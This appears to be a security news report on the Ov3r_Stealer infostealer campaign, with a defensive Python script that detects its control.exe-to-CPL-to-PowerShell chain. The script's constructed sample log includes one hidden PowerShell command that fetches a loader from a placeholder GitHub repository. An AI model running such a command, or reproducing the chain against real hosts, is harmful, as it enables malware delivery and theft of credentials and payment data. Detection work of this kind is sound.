Threat actors are using fake Facebook job ads to fool victims into installing Ov3r_Stealer, a new Windows-based information-stealing malware.
Ov3r_Stealer is designed to extract IP address-based location, hardware details, passwords, cookies, credit card info, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products from the infected host.
The campaign’s motive remains unclear; however, stolen data is often sold to other threat actors. Ov3r_Stealer may also be modified to deploy malware and other payloads, such as QakBot.
The attack initiates with a malicious PDF file seemingly hosted on OneDrive, enticing users to click on an “Access Document” button.
Trustwave discovered the PDF file posted on a fake Amazon CEO Andy Jassy Facebook account and Facebook advertisements promoting digital advertising opportunities.
Upon clicking the button, users are directed to a .URL file pretending to be a DocuSign document hosted on Discord’s CDN. A control panel item (.CPL) file is delivered through the shortcut file and executed by the Windows Control Panel process binary (“control.exe”).
Executing the CPL file triggers the retrieval of a PowerShell loader (“DATA1.txt”) from GitHub, which in turn executes Ov3r_Stealer.
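The execution chain described above (a .CPL item launched through control.exe from a user-writable path, followed by PowerShell fetching a loader from GitHub) is the part a defender can most readily catch in process-creation telemetry. The following is an added example, not code from Trustwave or from the original article: it parses a constructed process-creation log (a simplified "timestamp|image|parent|command line" format, not a real Sysmon or EDR schema) and flags the two stages. The assumptions are labelled in the comments: that a .CPL outside the Windows system directories is suspicious, that PowerShell spawned by control.exe or rundll32.exe (which control.exe commonly uses to host CPL items) with a GitHub URL on its command line is suspicious, and that the two stages occurring within a few minutes of each other indicate the chain. The user name, paths and GitHub repository in the sample log are placeholders.

```python
"""Detect the control.exe -> .CPL -> PowerShell-from-GitHub chain in process logs.
Added example with constructed sample data; the log format and the heuristics
below are assumptions, not the article's or Trustwave's own detection logic."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Constructed sample log: "timestamp|image|parent_image|command_line", one event per line.
# User name, file names and the GitHub repository are placeholders, not real indicators.
SAMPLE_LOG = r"""
2024-02-06T10:01:12Z|C:\Windows\explorer.exe|C:\Windows\System32\userinit.exe|C:\Windows\explorer.exe
2024-02-06T10:02:05Z|C:\Windows\System32\control.exe|C:\Windows\explorer.exe|"C:\Windows\System32\control.exe" "C:\Users\alice\AppData\Local\Temp\DocuSign_Document.cpl"
2024-02-06T10:02:06Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\control.exe|powershell.exe -w hidden -c "iwr https://raw.githubusercontent.com/PLACEHOLDER-REPO/DATA1.txt"
2024-02-06T10:05:00Z|C:\Windows\System32\control.exe|C:\Windows\explorer.exe|"C:\Windows\System32\control.exe" /name Microsoft.DateAndTime
2024-02-06T10:06:00Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|powershell.exe -NoProfile -File C:\Scripts\backup.ps1
"""

# A drive-letter path ending in .cpl anywhere on the command line.
CPL_PATH = re.compile(r'([A-Za-z]:\\[^"]*?\.cpl)\b', re.I)
# Assumption: legitimate Control Panel items live under the Windows system directories.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumption: a loader fetched from GitHub shows up as one of these hosts on the command line.
GITHUB_HOST = re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/", re.I)

STAGE_CPL = "cpl_outside_system_dir"
STAGE_PS = "powershell_from_control_panel_fetching_github"


@dataclass
class ProcEvent:
    ts: datetime
    image: str
    parent: str
    cmdline: str


def parse_log(text: str) -> List[ProcEvent]:
    """Parse the constructed pipe-separated format into events, oldest first."""
    events = []
    for line in text.strip().splitlines():
        ts, image, parent, cmdline = line.split("|", 3)
        events.append(ProcEvent(datetime.fromisoformat(ts.replace("Z", "+00:00")),
                                image, parent, cmdline))
    return events


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return the stage name an event matches, or None for benign events."""
    image, parent = basename(ev.image), basename(ev.parent)
    if image == "control.exe":
        m = CPL_PATH.search(ev.cmdline)
        if m and not m.group(1).lower().startswith(SYSTEM_DIRS):
            return STAGE_CPL
    # control.exe may host the CPL directly or via rundll32.exe; either parent counts.
    if (image in ("powershell.exe", "pwsh.exe")
            and parent in ("control.exe", "rundll32.exe")
            and GITHUB_HOST.search(ev.cmdline)):
        return STAGE_PS
    return None


def detect(text: str) -> List[Tuple[str, str]]:
    """All (timestamp, stage) hits in the log, in log order."""
    hits = []
    for ev in parse_log(text):
        stage = classify(ev)
        if stage:
            hits.append((ev.ts.isoformat(), stage))
    return hits


def chain_detected(text: str, window: timedelta = timedelta(minutes=5)) -> bool:
    """True when a suspicious CPL launch is followed by the PowerShell stage within the window."""
    cpl_seen_at = None
    for ev in parse_log(text):
        stage = classify(ev)
        if stage == STAGE_CPL:
            cpl_seen_at = ev.ts
        elif stage == STAGE_PS and cpl_seen_at and ev.ts - cpl_seen_at <= window:
            return True
    return False


if __name__ == "__main__":
    for ts, stage in detect(SAMPLE_LOG):
        print(ts, stage)
    print("chain detected:", chain_detected(SAMPLE_LOG))
```

The benign events in the sample (explorer.exe startup, a legitimate `control.exe /name ...` invocation, and an administrator's PowerShell script launched from Explorer) produce no hits, which is the point of keying on the parent process and the CPL path rather than on control.exe or PowerShell alone. On real telemetry the two stages should be correlated per host, and the GitHub host list widened to whatever hosting services your own intelligence sources report.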